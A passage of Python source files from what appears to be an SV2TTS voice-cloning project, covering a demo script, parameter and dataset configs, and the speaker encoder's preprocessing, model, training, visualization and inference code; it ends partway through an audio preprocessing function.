print("\tTesting the encoder...") encoder.embed_utterance(np.zeros(encoder.sampling_rate)) # Create a dummy embedding. You would normally use the embedding that encoder.embed_utterance # returns, but here we're going to make one ourselves just for the sake of showing that it's # possible. embed = np.random.rand(speaker_embedding_size) # Embeddings are L2-normalized (this isn't important here, but if you want to make your own # embeddings it will be). embed /= np.linalg.norm(embed) # The synthesizer can handle multiple inputs with batching. Let's create another embedding to # illustrate that embeds = [embed, np.zeros(speaker_embedding_size)] texts = ["test 1", "test 2"] print("\tTesting the synthesizer... (loading the model will output a lot of text)") mels = synthesizer.synthesize_spectrograms(texts, embeds) # The vocoder synthesizes one waveform at a time, but it's more efficient for long ones. We # can concatenate the mel spectrograms to a single one. mel = np.concatenate(mels, axis=1) # The vocoder can take a callback function to display the generation. More on that later. For # now we'll simply hide it like this: no_action = lambda *args: None print("\tTesting the vocoder...") # For the sake of making this test short, we'll pass a short target length. The target length # is the length of the wav segments that are processed in parallel. E.g. for audio sampled # at 16000 Hertz, a target length of 8000 means that the target audio will be cut in chunks of # 0.5 seconds which will all be generated together. The parameters here are absurdly short, and # that has a detrimental effect on the quality of the audio. The default parameters are # recommended in general. vocoder.infer_waveform(mel, target=200, overlap=50, progress_callback=no_action) print("All test passed! You can now synthesize speech.\n\n") ## Interactive speech generation print("This is a GUI-less example of interface to SV2TTS. The purpose of this script is to " "show how you can interface this project easily with your own. See the source code for " "an explanation of what is happening.\n") print("Interactive generation loop") num_generated = 0 while True: try: # Get the reference audio filepath message = "Reference voice: enter an audio filepath of a voice to be cloned (mp3, " \ "wav, m4a, flac, ...):\n" in_fpath = Path(input(message).replace("\"", "").replace("\'", "")) ## Computing the embedding # First, we load the wav using the function that the speaker encoder provides. This is # important: there is preprocessing that must be applied. # The following two methods are equivalent: # - Directly load from the filepath: preprocessed_wav = encoder.preprocess_wav(in_fpath) # - If the wav is already loaded: original_wav, sampling_rate = librosa.load(str(in_fpath)) preprocessed_wav = encoder.preprocess_wav(original_wav, sampling_rate) print("Loaded file succesfully") # Then we derive the embedding. There are many functions and parameters that the # speaker encoder interfaces. These are mostly for in-depth research. You will typically # only use this function (with its default parameters): embed = encoder.embed_utterance(preprocessed_wav) print("Created the embedding") ## Generating the spectrogram text = input("Write a sentence (+-20 words) to be synthesized:\n") # If seed is specified, reset torch seed and force synthesizer reload if args.seed is not None: torch.manual_seed(args.seed) synthesizer = Synthesizer(args.syn_model_fpath) # The synthesizer works in batch, so you need to put your data in a list or numpy array texts = [text] embeds = [embed] # If you know what the attention layer alignments are, you can retrieve them here by # passing return_alignments=True specs = synthesizer.synthesize_spectrograms(texts, embeds) spec = specs[0] print("Created the mel spectrogram") ## Generating the waveform print("Synthesizing the waveform:") # If seed is specified, reset torch seed and reload vocoder if args.seed is not None: torch.manual_seed(args.seed) vocoder.load_model(args.voc_model_fpath) # Synthesizing the waveform is fairly straightforward. Remember that the longer the # spectrogram, the more time-efficient the vocoder. generated_wav = vocoder.infer_waveform(spec) ## Post-generation # There's a bug with sounddevice that makes the audio cut one second earlier, so we # pad it. generated_wav = np.pad(generated_wav, (0, synthesizer.sample_rate), mode="constant") # Trim excess silences to compensate for gaps in spectrograms (issue #53) generated_wav = encoder.preprocess_wav(generated_wav) # Play the audio (non-blocking) if not args.no_sound: import sounddevice as sd try: sd.stop() sd.play(generated_wav, synthesizer.sample_rate) except sd.PortAudioError as e: print("\nCaught exception: %s" % repr(e)) print("Continuing without audio playback. Suppress this message with the \"--no_sound\" flag.\n") except: raise # Save it on the disk filename = "demo_output_%02d.wav" % num_generated print(generated_wav.dtype) sf.write(filename, generated_wav.astype(np.float32), synthesizer.sample_rate) num_generated += 1 print("\nSaved output as %s\n\n" % filename) except Exception as e: print("Caught exception: %s" % repr(e)) print("Restarting\n") File: encoder/params_data.py ## Mel-filterbank mel_window_length = 25 # In milliseconds mel_window_step = 10 # In milliseconds mel_n_channels = 40 ## Audio sampling_rate = 16000 # Number of spectrogram frames in a partial utterance partials_n_frames = 160 # 1600 ms # Number of spectrogram frames at inference inference_n_frames = 80 # 800 ms ## Voice Activation Detection # Window size of the VAD. Must be either 10, 20 or 30 milliseconds. # This sets the granularity of the VAD. Should not need to be changed. vad_window_length = 30 # In milliseconds # Number of frames to average together when performing the moving average smoothing. # The larger this value, the larger the VAD variations must be to not get smoothed out. vad_moving_average_width = 8 # Maximum number of consecutive silent frames a segment can have. vad_max_silence_length = 6 ## Audio volume normalization audio_norm_target_dBFS = -30 File: encoder/params_model.py ## Model parameters model_hidden_size = 256 model_embedding_size = 256 model_num_layers = 3 ## Training parameters learning_rate_init = 1e-4 speakers_per_batch = 64 utterances_per_speaker = 10 File: encoder/config.py librispeech_datasets = { "train": { "clean": ["LibriSpeech/train-clean-100", "LibriSpeech/train-clean-360"], "other": ["LibriSpeech/train-other-500"] }, "test": { "clean": ["LibriSpeech/test-clean"], "other": ["LibriSpeech/test-other"] }, "dev": { "clean": ["LibriSpeech/dev-clean"], "other": ["LibriSpeech/dev-other"] }, } libritts_datasets = { "train": { "clean": ["LibriTTS/train-clean-100", "LibriTTS/train-clean-360"], "other": ["LibriTTS/train-other-500"] }, "test": { "clean": ["LibriTTS/test-clean"], "other": ["LibriTTS/test-other"] }, "dev": { "clean": ["LibriTTS/dev-clean"], "other": ["LibriTTS/dev-other"] }, } voxceleb_datasets = { "voxceleb1" : { "train": ["VoxCeleb1/wav"], "test": ["VoxCeleb1/test_wav"] }, "voxceleb2" : { "train": ["VoxCeleb2/dev/aac"], "test": ["VoxCeleb2/test_wav"] } } other_datasets = [ "LJSpeech-1.1", "VCTK-Corpus/wav48", ] anglophone_nationalites = ["australia", "canada", "ireland", "uk", "usa"] File: encoder/preprocess.py from datetime import datetime from functools import partial from multiprocessing import Pool from pathlib import Path import numpy as np from tqdm import tqdm from encoder import audio from encoder.config import librispeech_datasets, anglophone_nationalites from encoder.params_data import * _AUDIO_EXTENSIONS = ("wav", "flac", "m4a", "mp3") class DatasetLog: """ Registers metadata about the dataset in a text file. """ def __init__(self, root, name): self.text_file = open(Path(root, "Log_%s.txt" % name.replace("/", "_")), "w") self.sample_data = dict() start_time = str(datetime.now().strftime("%A %d %B %Y at %H:%M")) self.write_line("Creating dataset %s on %s" % (name, start_time)) self.write_line("-----") self._log_params() def _log_params(self): from encoder import params_data self.write_line("Parameter values:") for param_name in (p for p in dir(params_data) if not p.startswith("__")): value = getattr(params_data, param_name) self.write_line("\t%s: %s" % (param_name, value)) self.write_line("-----") def write_line(self, line): self.text_file.write("%s\n" % line) def add_sample(self, **kwargs): for param_name, value in kwargs.items(): if not param_name in self.sample_data: self.sample_data[param_name] = [] self.sample_data[param_name].append(value) def finalize(self): self.write_line("Statistics:") for param_name, values in self.sample_data.items(): self.write_line("\t%s:" % param_name) self.write_line("\t\tmin %.3f, max %.3f" % (np.min(values), np.max(values))) self.write_line("\t\tmean %.3f, median %.3f" % (np.mean(values), np.median(values))) self.write_line("-----") end_time = str(datetime.now().strftime("%A %d %B %Y at %H:%M")) self.write_line("Finished on %s" % end_time) self.text_file.close() def _init_preprocess_dataset(dataset_name, datasets_root, out_dir) -> (Path, DatasetLog): dataset_root = datasets_root.joinpath(dataset_name) if not dataset_root.exists(): print("Couldn\'t find %s, skipping this dataset." % dataset_root) return None, None return dataset_root, DatasetLog(out_dir, dataset_name) def _preprocess_speaker(speaker_dir: Path, datasets_root: Path, out_dir: Path, skip_existing: bool): # Give a name to the speaker that includes its dataset speaker_name = "_".join(speaker_dir.relative_to(datasets_root).parts) # Create an output directory with that name, as well as a txt file containing a # reference to each source file. speaker_out_dir = out_dir.joinpath(speaker_name) speaker_out_dir.mkdir(exist_ok=True) sources_fpath = speaker_out_dir.joinpath("_sources.txt") # There's a possibility that the preprocessing was interrupted earlier, check if # there already is a sources file. if sources_fpath.exists(): try: with sources_fpath.open("r") as sources_file: existing_fnames = {line.split(",")[0] for line in sources_file} except: existing_fnames = {} else: existing_fnames = {} # Gather all audio files for that speaker recursively sources_file = sources_fpath.open("a" if skip_existing else "w") audio_durs = [] for extension in _AUDIO_EXTENSIONS: for in_fpath in speaker_dir.glob("**/*.%s" % extension): # Check if the target output file already exists out_fname = "_".join(in_fpath.relative_to(speaker_dir).parts) out_fname = out_fname.replace(".%s" % extension, ".npy") if skip_existing and out_fname in existing_fnames: continue # Load and preprocess the waveform wav = audio.preprocess_wav(in_fpath) if len(wav) == 0: continue # Create the mel spectrogram, discard those that are too short frames = audio.wav_to_mel_spectrogram(wav) if len(frames) < partials_n_frames: continue out_fpath = speaker_out_dir.joinpath(out_fname) np.save(out_fpath, frames) sources_file.write("%s,%s\n" % (out_fname, in_fpath)) audio_durs.append(len(wav) / sampling_rate) sources_file.close() return audio_durs def _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger): print("%s: Preprocessing data for %d speakers." % (dataset_name, len(speaker_dirs))) # Process the utterances for each speaker work_fn = partial(_preprocess_speaker, datasets_root=datasets_root, out_dir=out_dir, skip_existing=skip_existing) with Pool(4) as pool: tasks = pool.imap(work_fn, speaker_dirs) for sample_durs in tqdm(tasks, dataset_name, len(speaker_dirs), unit="speakers"): for sample_dur in sample_durs: logger.add_sample(duration=sample_dur) logger.finalize() print("Done preprocessing %s.\n" % dataset_name) def preprocess_librispeech(datasets_root: Path, out_dir: Path, skip_existing=False): for dataset_name in librispeech_datasets["train"]["other"]: # Initialize the preprocessing dataset_root, logger = _init_preprocess_dataset(dataset_name, datasets_root, out_dir) if not dataset_root: return # Preprocess all speakers speaker_dirs = list(dataset_root.glob("*")) _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger) def preprocess_voxceleb1(datasets_root: Path, out_dir: Path, skip_existing=False): # Initialize the preprocessing dataset_name = "VoxCeleb1" dataset_root, logger = _init_preprocess_dataset(dataset_name, datasets_root, out_dir) if not dataset_root: return # Get the contents of the meta file with dataset_root.joinpath("vox1_meta.csv").open("r") as metafile: metadata = [line.split("\t") for line in metafile][1:] # Select the ID and the nationality, filter out non-anglophone speakers nationalities = {line[0]: line[3] for line in metadata} keep_speaker_ids = [speaker_id for speaker_id, nationality in nationalities.items() if nationality.lower() in anglophone_nationalites] print("VoxCeleb1: using samples from %d (presumed anglophone) speakers out of %d." % (len(keep_speaker_ids), len(nationalities))) # Get the speaker directories for anglophone speakers only speaker_dirs = dataset_root.joinpath("wav").glob("*") speaker_dirs = [speaker_dir for speaker_dir in speaker_dirs if speaker_dir.name in keep_speaker_ids] print("VoxCeleb1: found %d anglophone speakers on the disk, %d missing (this is normal)." % (len(speaker_dirs), len(keep_speaker_ids) - len(speaker_dirs))) # Preprocess all speakers _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger) def preprocess_voxceleb2(datasets_root: Path, out_dir: Path, skip_existing=False): # Initialize the preprocessing dataset_name = "VoxCeleb2" dataset_root, logger = _init_preprocess_dataset(dataset_name, datasets_root, out_dir) if not dataset_root: return # Get the speaker directories # Preprocess all speakers speaker_dirs = list(dataset_root.joinpath("dev", "aac").glob("*")) _preprocess_speaker_dirs(speaker_dirs, dataset_name, datasets_root, out_dir, skip_existing, logger) File: encoder/__init__.py File: encoder/model.py from encoder.params_model import * from encoder.params_data import * from scipy.interpolate import interp1d from sklearn.metrics import roc_curve from torch.nn.utils import clip_grad_norm_ from scipy.optimize import brentq from torch import nn import numpy as np import torch class SpeakerEncoder(nn.Module): def __init__(self, device, loss_device): super().__init__() self.loss_device = loss_device # Network defition self.lstm = nn.LSTM(input_size=mel_n_channels, hidden_size=model_hidden_size, num_layers=model_num_layers, batch_first=True).to(device) self.linear = nn.Linear(in_features=model_hidden_size, out_features=model_embedding_size).to(device) self.relu = torch.nn.ReLU().to(device) # Cosine similarity scaling (with fixed initial parameter values) self.similarity_weight = nn.Parameter(torch.tensor([10.])).to(loss_device) self.similarity_bias = nn.Parameter(torch.tensor([-5.])).to(loss_device) # Loss self.loss_fn = nn.CrossEntropyLoss().to(loss_device) def do_gradient_ops(self): # Gradient scale self.similarity_weight.grad *= 0.01 self.similarity_bias.grad *= 0.01 # Gradient clipping clip_grad_norm_(self.parameters(), 3, norm_type=2) def forward(self, utterances, hidden_init=None): """ Computes the embeddings of a batch of utterance spectrograms. :param utterances: batch of mel-scale filterbanks of same duration as a tensor of shape (batch_size, n_frames, n_channels) :param hidden_init: initial hidden state of the LSTM as a tensor of shape (num_layers, batch_size, hidden_size). Will default to a tensor of zeros if None. :return: the embeddings as a tensor of shape (batch_size, embedding_size) """ # Pass the input through the LSTM layers and retrieve all outputs, the final hidden state # and the final cell state. out, (hidden, cell) = self.lstm(utterances, hidden_init) # We take only the hidden state of the last layer embeds_raw = self.relu(self.linear(hidden[-1])) # L2-normalize it embeds = embeds_raw / (torch.norm(embeds_raw, dim=1, keepdim=True) + 1e-5) return embeds def similarity_matrix(self, embeds): """ Computes the similarity matrix according the section 2.1 of GE2E. :param embeds: the embeddings as a tensor of shape (speakers_per_batch, utterances_per_speaker, embedding_size) :return: the similarity matrix as a tensor of shape (speakers_per_batch, utterances_per_speaker, speakers_per_batch) """ speakers_per_batch, utterances_per_speaker = embeds.shape[:2] # Inclusive centroids (1 per speaker). Cloning is needed for reverse differentiation centroids_incl = torch.mean(embeds, dim=1, keepdim=True) centroids_incl = centroids_incl.clone() / (torch.norm(centroids_incl, dim=2, keepdim=True) + 1e-5) # Exclusive centroids (1 per utterance) centroids_excl = (torch.sum(embeds, dim=1, keepdim=True) - embeds) centroids_excl /= (utterances_per_speaker - 1) centroids_excl = centroids_excl.clone() / (torch.norm(centroids_excl, dim=2, keepdim=True) + 1e-5) # Similarity matrix. The cosine similarity of already 2-normed vectors is simply the dot # product of these vectors (which is just an element-wise multiplication reduced by a sum). # We vectorize the computation for efficiency. sim_matrix = torch.zeros(speakers_per_batch, utterances_per_speaker, speakers_per_batch).to(self.loss_device) mask_matrix = 1 - np.eye(speakers_per_batch, dtype=np.int) for j in range(speakers_per_batch): mask = np.where(mask_matrix[j])[0] sim_matrix[mask, :, j] = (embeds[mask] * centroids_incl[j]).sum(dim=2) sim_matrix[j, :, j] = (embeds[j] * centroids_excl[j]).sum(dim=1) ## Even more vectorized version (slower maybe because of transpose) # sim_matrix2 = torch.zeros(speakers_per_batch, speakers_per_batch, utterances_per_speaker # ).to(self.loss_device) # eye = np.eye(speakers_per_batch, dtype=np.int) # mask = np.where(1 - eye) # sim_matrix2[mask] = (embeds[mask[0]] * centroids_incl[mask[1]]).sum(dim=2) # mask = np.where(eye) # sim_matrix2[mask] = (embeds * centroids_excl).sum(dim=2) # sim_matrix2 = sim_matrix2.transpose(1, 2) sim_matrix = sim_matrix * self.similarity_weight + self.similarity_bias return sim_matrix def loss(self, embeds): """ Computes the softmax loss according the section 2.1 of GE2E. :param embeds: the embeddings as a tensor of shape (speakers_per_batch, utterances_per_speaker, embedding_size) :return: the loss and the EER for this batch of embeddings. """ speakers_per_batch, utterances_per_speaker = embeds.shape[:2] # Loss sim_matrix = self.similarity_matrix(embeds) sim_matrix = sim_matrix.reshape((speakers_per_batch * utterances_per_speaker, speakers_per_batch)) ground_truth = np.repeat(np.arange(speakers_per_batch), utterances_per_speaker) target = torch.from_numpy(ground_truth).long().to(self.loss_device) loss = self.loss_fn(sim_matrix, target) # EER (not backpropagated) with torch.no_grad(): inv_argmax = lambda i: np.eye(1, speakers_per_batch, i, dtype=np.int)[0] labels = np.array([inv_argmax(i) for i in ground_truth]) preds = sim_matrix.detach().cpu().numpy() # Snippet from https://yangcha.github.io/EER-ROC/ fpr, tpr, thresholds = roc_curve(labels.flatten(), preds.flatten()) eer = brentq(lambda x: 1. - x - interp1d(fpr, tpr)(x), 0., 1.) return loss, eer File: encoder/visualizations.py from datetime import datetime from time import perf_counter as timer import numpy as np import umap import visdom from encoder.data_objects.speaker_verification_dataset import SpeakerVerificationDataset colormap = np.array([ [76, 255, 0], [0, 127, 70], [255, 0, 0], [255, 217, 38], [0, 135, 255], [165, 0, 165], [255, 167, 255], [0, 255, 255], [255, 96, 38], [142, 76, 0], [33, 0, 127], [0, 0, 0], [183, 183, 183], ], dtype=np.float) / 255 class Visualizations: def __init__(self, env_name=None, update_every=10, server="http://localhost", disabled=False): # Tracking data self.last_update_timestamp = timer() self.update_every = update_every self.step_times = [] self.losses = [] self.eers = [] print("Updating the visualizations every %d steps." % update_every) # If visdom is disabled TODO: use a better paradigm for that self.disabled = disabled if self.disabled: return # Set the environment name now = str(datetime.now().strftime("%d-%m %Hh%M")) if env_name is None: self.env_name = now else: self.env_name = "%s (%s)" % (env_name, now) # Connect to visdom and open the corresponding window in the browser try: self.vis = visdom.Visdom(server, env=self.env_name, raise_exceptions=True) except ConnectionError: raise Exception("No visdom server detected. Run the command \"visdom\" in your CLI to " "start it.") # webbrowser.open("http://localhost:8097/env/" + self.env_name) # Create the windows self.loss_win = None self.eer_win = None # self.lr_win = None self.implementation_win = None self.projection_win = None self.implementation_string = "" def log_params(self): if self.disabled: return from encoder import params_data from encoder import params_model param_string = "<b>Model parameters</b>:<br>" for param_name in (p for p in dir(params_model) if not p.startswith("__")): value = getattr(params_model, param_name) param_string += "\t%s: %s<br>" % (param_name, value) param_string += "<b>Data parameters</b>:<br>" for param_name in (p for p in dir(params_data) if not p.startswith("__")): value = getattr(params_data, param_name) param_string += "\t%s: %s<br>" % (param_name, value) self.vis.text(param_string, opts={"title": "Parameters"}) def log_dataset(self, dataset: SpeakerVerificationDataset): if self.disabled: return dataset_string = "" dataset_string += "<b>Speakers</b>: %s\n" % len(dataset.speakers) dataset_string += "\n" + dataset.get_logs() dataset_string = dataset_string.replace("\n", "<br>") self.vis.text(dataset_string, opts={"title": "Dataset"}) def log_implementation(self, params): if self.disabled: return implementation_string = "" for param, value in params.items(): implementation_string += "<b>%s</b>: %s\n" % (param, value) implementation_string = implementation_string.replace("\n", "<br>") self.implementation_string = implementation_string self.implementation_win = self.vis.text( implementation_string, opts={"title": "Training implementation"} ) def update(self, loss, eer, step): # Update the tracking data now = timer() self.step_times.append(1000 * (now - self.last_update_timestamp)) self.last_update_timestamp = now self.losses.append(loss) self.eers.append(eer) print(".", end="") # Update the plots every <update_every> steps if step % self.update_every != 0: return time_string = "Step time: mean: %5dms std: %5dms" % \ (int(np.mean(self.step_times)), int(np.std(self.step_times))) print("\nStep %6d Loss: %.4f EER: %.4f %s" % (step, np.mean(self.losses), np.mean(self.eers), time_string)) if not self.disabled: self.loss_win = self.vis.line( [np.mean(self.losses)], [step], win=self.loss_win, update="append" if self.loss_win else None, opts=dict( legend=["Avg. loss"], xlabel="Step", ylabel="Loss", title="Loss", ) ) self.eer_win = self.vis.line( [np.mean(self.eers)], [step], win=self.eer_win, update="append" if self.eer_win else None, opts=dict( legend=["Avg. EER"], xlabel="Step", ylabel="EER", title="Equal error rate" ) ) if self.implementation_win is not None: self.vis.text( self.implementation_string + ("<b>%s</b>" % time_string), win=self.implementation_win, opts={"title": "Training implementation"}, ) # Reset the tracking self.losses.clear() self.eers.clear() self.step_times.clear() def draw_projections(self, embeds, utterances_per_speaker, step, out_fpath=None, max_speakers=10): import matplotlib.pyplot as plt max_speakers = min(max_speakers, len(colormap)) embeds = embeds[:max_speakers * utterances_per_speaker] n_speakers = len(embeds) // utterances_per_speaker ground_truth = np.repeat(np.arange(n_speakers), utterances_per_speaker) colors = [colormap[i] for i in ground_truth] reducer = umap.UMAP() projected = reducer.fit_transform(embeds) plt.scatter(projected[:, 0], projected[:, 1], c=colors) plt.gca().set_aspect("equal", "datalim") plt.title("UMAP projection (step %d)" % step) if not self.disabled: self.projection_win = self.vis.matplot(plt, win=self.projection_win) if out_fpath is not None: plt.savefig(out_fpath) plt.clf() def save(self): if not self.disabled: self.vis.save([self.env_name]) File: encoder/train.py from pathlib import Path import torch from encoder.data_objects import SpeakerVerificationDataLoader, SpeakerVerificationDataset from encoder.model import SpeakerEncoder from encoder.params_model import * from encoder.visualizations import Visualizations from utils.profiler import Profiler def sync(device: torch.device): # For correct profiling (cuda operations are async) if device.type == "cuda": torch.cuda.synchronize(device) def train(run_id: str, clean_data_root: Path, models_dir: Path, umap_every: int, save_every: int, backup_every: int, vis_every: int, force_restart: bool, visdom_server: str, no_visdom: bool): # Create a dataset and a dataloader dataset = SpeakerVerificationDataset(clean_data_root) loader = SpeakerVerificationDataLoader( dataset, speakers_per_batch, utterances_per_speaker, num_workers=4, ) # Setup the device on which to run the forward pass and the loss. These can be different, # because the forward pass is faster on the GPU whereas the loss is often (depending on your # hyperparameters) faster on the CPU. device = torch.device("cuda" if torch.cuda.is_available() else "cpu") # FIXME: currently, the gradient is None if loss_device is cuda loss_device = torch.device("cpu") # Create the model and the optimizer model = SpeakerEncoder(device, loss_device) optimizer = torch.optim.Adam(model.parameters(), lr=learning_rate_init) init_step = 1 # Configure file path for the model model_dir = models_dir / run_id model_dir.mkdir(exist_ok=True, parents=True) state_fpath = model_dir / "encoder.pt" # Load any existing model if not force_restart: if state_fpath.exists(): print("Found existing model \"%s\", loading it and resuming training." % run_id) checkpoint = torch.load(state_fpath) init_step = checkpoint["step"] model.load_state_dict(checkpoint["model_state"]) optimizer.load_state_dict(checkpoint["optimizer_state"]) optimizer.param_groups[0]["lr"] = learning_rate_init else: print("No model \"%s\" found, starting training from scratch." % run_id) else: print("Starting the training from scratch.") model.train() # Initialize the visualization environment vis = Visualizations(run_id, vis_every, server=visdom_server, disabled=no_visdom) vis.log_dataset(dataset) vis.log_params() device_name = str(torch.cuda.get_device_name(0) if torch.cuda.is_available() else "CPU") vis.log_implementation({"Device": device_name}) # Training loop profiler = Profiler(summarize_every=10, disabled=False) for step, speaker_batch in enumerate(loader, init_step): profiler.tick("Blocking, waiting for batch (threaded)") # Forward pass inputs = torch.from_numpy(speaker_batch.data).to(device) sync(device) profiler.tick("Data to %s" % device) embeds = model(inputs) sync(device) profiler.tick("Forward pass") embeds_loss = embeds.view((speakers_per_batch, utterances_per_speaker, -1)).to(loss_device) loss, eer = model.loss(embeds_loss) sync(loss_device) profiler.tick("Loss") # Backward pass model.zero_grad() loss.backward() profiler.tick("Backward pass") model.do_gradient_ops() optimizer.step() profiler.tick("Parameter update") # Update visualizations # learning_rate = optimizer.param_groups[0]["lr"] vis.update(loss.item(), eer, step) # Draw projections and save them to the backup folder if umap_every != 0 and step % umap_every == 0: print("Drawing and saving projections (step %d)" % step) projection_fpath = model_dir / f"umap_{step:06d}.png" embeds = embeds.detach().cpu().numpy() vis.draw_projections(embeds, utterances_per_speaker, step, projection_fpath) vis.save() # Overwrite the latest version of the model if save_every != 0 and step % save_every == 0: print("Saving the model (step %d)" % step) torch.save({ "step": step + 1, "model_state": model.state_dict(), "optimizer_state": optimizer.state_dict(), }, state_fpath) # Make a backup if backup_every != 0 and step % backup_every == 0: print("Making a backup (step %d)" % step) backup_fpath = model_dir / f"encoder_{step:06d}.bak" torch.save({ "step": step + 1, "model_state": model.state_dict(), "optimizer_state": optimizer.state_dict(), }, backup_fpath) profiler.tick("Extras (visualizations, saving)") File: encoder/inference.py from encoder.params_data import * from encoder.model import SpeakerEncoder from encoder.audio import preprocess_wav # We want to expose this function from here from matplotlib import cm from encoder import audio from pathlib import Path import numpy as np import torch _model = None # type: SpeakerEncoder _device = None # type: torch.device def load_model(weights_fpath: Path, device=None): """ Loads the model in memory. If this function is not explicitely called, it will be run on the first call to embed_frames() with the default weights file. :param weights_fpath: the path to saved model weights. :param device: either a torch device or the name of a torch device (e.g. "cpu", "cuda"). The model will be loaded and will run on this device. Outputs will however always be on the cpu. If None, will default to your GPU if it"s available, otherwise your CPU. """ # TODO: I think the slow loading of the encoder might have something to do with the device it # was saved on. Worth investigating. global _model, _device if device is None: _device = torch.device("cuda" if torch.cuda.is_available() else "cpu") elif isinstance(device, str): _device = torch.device(device) _model = SpeakerEncoder(_device, torch.device("cpu")) checkpoint = torch.load(weights_fpath, _device) _model.load_state_dict(checkpoint["model_state"]) _model.eval() print("Loaded encoder \"%s\" trained to step %d" % (weights_fpath.name, checkpoint["step"])) def is_loaded(): return _model is not None def embed_frames_batch(frames_batch): """ Computes embeddings for a batch of mel spectrogram. :param frames_batch: a batch mel of spectrogram as a numpy array of float32 of shape (batch_size, n_frames, n_channels) :return: the embeddings as a numpy array of float32 of shape (batch_size, model_embedding_size) """ if _model is None: raise Exception("Model was not loaded. Call load_model() before inference.") frames = torch.from_numpy(frames_batch).to(_device) embed = _model.forward(frames).detach().cpu().numpy() return embed def compute_partial_slices(n_samples, partial_utterance_n_frames=partials_n_frames, min_pad_coverage=0.75, overlap=0.5): """ Computes where to split an utterance waveform and its corresponding mel spectrogram to obtain partial utterances of <partial_utterance_n_frames> each. Both the waveform and the mel spectrogram slices are returned, so as to make each partial utterance waveform correspond to its spectrogram. This function assumes that the mel spectrogram parameters used are those defined in params_data.py. The returned ranges may be indexing further than the length of the waveform. It is recommended that you pad the waveform with zeros up to wave_slices[-1].stop. :param n_samples: the number of samples in the waveform :param partial_utterance_n_frames: the number of mel spectrogram frames in each partial utterance :param min_pad_coverage: when reaching the last partial utterance, it may or may not have enough frames. If at least <min_pad_coverage> of <partial_utterance_n_frames> are present, then the last partial utterance will be considered, as if we padded the audio. Otherwise, it will be discarded, as if we trimmed the audio. If there aren't enough frames for 1 partial utterance, this parameter is ignored so that the function always returns at least 1 slice. :param overlap: by how much the partial utterance should overlap. If set to 0, the partial utterances are entirely disjoint. :return: the waveform slices and mel spectrogram slices as lists of array slices. Index respectively the waveform and the mel spectrogram with these slices to obtain the partial utterances. """ assert 0 <= overlap < 1 assert 0 < min_pad_coverage <= 1 samples_per_frame = int((sampling_rate * mel_window_step / 1000)) n_frames = int(np.ceil((n_samples + 1) / samples_per_frame)) frame_step = max(int(np.round(partial_utterance_n_frames * (1 - overlap))), 1) # Compute the slices wav_slices, mel_slices = [], [] steps = max(1, n_frames - partial_utterance_n_frames + frame_step + 1) for i in range(0, steps, frame_step): mel_range = np.array([i, i + partial_utterance_n_frames]) wav_range = mel_range * samples_per_frame mel_slices.append(slice(*mel_range)) wav_slices.append(slice(*wav_range)) # Evaluate whether extra padding is warranted or not last_wav_range = wav_slices[-1] coverage = (n_samples - last_wav_range.start) / (last_wav_range.stop - last_wav_range.start) if coverage < min_pad_coverage and len(mel_slices) > 1: mel_slices = mel_slices[:-1] wav_slices = wav_slices[:-1] return wav_slices, mel_slices def embed_utterance(wav, using_partials=True, return_partials=False, **kwargs): """ Computes an embedding for a single utterance. # TODO: handle multiple wavs to benefit from batching on GPU :param wav: a preprocessed (see audio.py) utterance waveform as a numpy array of float32 :param using_partials: if True, then the utterance is split in partial utterances of <partial_utterance_n_frames> frames and the utterance embedding is computed from their normalized average. If False, the utterance is instead computed from feeding the entire spectogram to the network. :param return_partials: if True, the partial embeddings will also be returned along with the wav slices that correspond to the partial embeddings. :param kwargs: additional arguments to compute_partial_splits() :return: the embedding as a numpy array of float32 of shape (model_embedding_size,). If <return_partials> is True, the partial utterances as a numpy array of float32 of shape (n_partials, model_embedding_size) and the wav partials as a list of slices will also be returned. If <using_partials> is simultaneously set to False, both these values will be None instead. """ # Process the entire utterance if not using partials if not using_partials: frames = audio.wav_to_mel_spectrogram(wav) embed = embed_frames_batch(frames[None, ...])[0] if return_partials: return embed, None, None return embed # Compute where to split the utterance into partials and pad if necessary wave_slices, mel_slices = compute_partial_slices(len(wav), **kwargs) max_wave_length = wave_slices[-1].stop if max_wave_length >= len(wav): wav = np.pad(wav, (0, max_wave_length - len(wav)), "constant") # Split the utterance into partials frames = audio.wav_to_mel_spectrogram(wav) frames_batch = np.array([frames[s] for s in mel_slices]) partial_embeds = embed_frames_batch(frames_batch) # Compute the utterance embedding from the partial embeddings raw_embed = np.mean(partial_embeds, axis=0) embed = raw_embed / np.linalg.norm(raw_embed, 2) if return_partials: return embed, partial_embeds, wave_slices return embed def embed_speaker(wavs, **kwargs): raise NotImplemented() def plot_embedding_as_heatmap(embed, ax=None, title="", shape=None, color_range=(0, 0.30)): import matplotlib.pyplot as plt if ax is None: ax = plt.gca() if shape is None: height = int(np.sqrt(len(embed))) shape = (height, -1) embed = embed.reshape(shape) cmap = cm.get_cmap() mappable = ax.imshow(embed, cmap=cmap) cbar = plt.colorbar(mappable, ax=ax, fraction=0.046, pad=0.04) sm = cm.ScalarMappable(cmap=cmap) sm.set_clim(*color_range) ax.set_xticks([]), ax.set_yticks([]) ax.set_title(title) File: encoder/audio.py from scipy.ndimage.morphology import binary_dilation from encoder.params_data import * from pathlib import Path from typing import Optional, Union from warnings import warn import numpy as np import librosa import struct try: import webrtcvad except: warn("Unable to import 'webrtcvad'. This package enables noise removal and is recommended.") webrtcvad=None int16_max = (2 ** 15) - 1 def preprocess_wav(fpath_or_wav: Union[str, Path, np.ndarray], source_sr: Optional[int] = None, normalize: Optional[bool] = True, trim_silence: Optional[bool] = True): """ Applies the preprocessing operations used in training the Speaker Encoder to a waveform either on disk or in memory. The waveform will be resampled to match the data hyperparameters. :param fpath_or_wav: either a filepath to an audio file (many extensions are supported, not just .wav), either the waveform as a numpy array of floats. :param source_sr: if passing an audio waveform, the sampling rate of the waveform before preprocessing. After preprocessing, the waveform's sampling rate will match the data hyperparameters. If passing a filepath, the sampling rate will be automatically detected and this argument will be ignored. """ # Load the wav from disk if needed if isinstance(fpath_or_wav, str) or isinstance(fpath_or_wav, Path): wav, source_sr = librosa.load(str(fpath_or_wav), sr=None) else: wav = fpath_or_wav # Resample the wav if needed if source_sr is not None and source_sr != sampling_rate: wav = librosa.resample(wav, source_sr, sampling_rate) # Apply the preprocessing: normalize volume and shorten long silences if normalize: wav = normalize_volume(wav, audio_norm_target_dBFS, 